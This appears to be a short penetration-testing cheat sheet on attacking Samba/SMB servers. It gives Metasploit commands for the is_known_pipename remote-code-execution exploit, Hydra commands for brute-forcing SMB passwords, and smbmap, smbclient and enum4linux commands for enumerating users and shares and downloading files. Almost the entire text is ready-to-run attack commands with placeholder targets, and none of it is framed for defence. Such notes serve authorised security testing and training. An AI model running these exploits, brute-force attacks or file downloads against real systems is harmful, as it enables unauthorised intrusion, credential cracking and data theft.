Samba

Samba is the Linux implementation of SMB, and allows Windows systems to access Linux shares and files.

Samba v3.5.0 is vulnerable to a remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.

Exploitation using Metasploit

use exploit/linux/samba/is_known_pipename

set RHOSTS TARGET_IP

run

Attack Vectors

Hydra

Brute force attach with Hydra

hydra -L USERS_LIST -P PASS_LIST TARGET_IP smb

hydra -l USER_NAME -P PASS_LIST TARGET_IP smb

Enumeration

smbmap

# List shares
smbmap -H TARGET_IP -u USERNAME -p PASSWORD

# Recursive list
smbmap -H TARGET_IP -u USERNAME -p PASSWORD -r

# Recursive list of a specific share
smbmap -H TARGET_IP -u USERNAME -p PASSWORD -r 'SHARE_NAME'

# Download file
smbmap -H TARGET_IP -u USERNAME -p PASSWORD --download 'SHARE_NAME/FILE_NAME'

smbclient

# List shares on the Samba server
smbclient -L TARGET_IP -U USERNAME
# Enter password

# Access a share
smbclient //TARGET_IP/SHARE_NAME -U USERNAME

enum4linux

Enum4linux is a tool for enumerating information from SMB and Samba systems. It attempts to offer similar functionality to enum.exe.

enum4linux -a TARGET_IP

# Enumeration using credentials
enum4linux -a -u USERNAME -p PASSWORD TARGET_IP

# Get users list
enum4linux -U -o TARGET_IP

# Do all simple enumeration
enum4linux -a -o TARGET_IP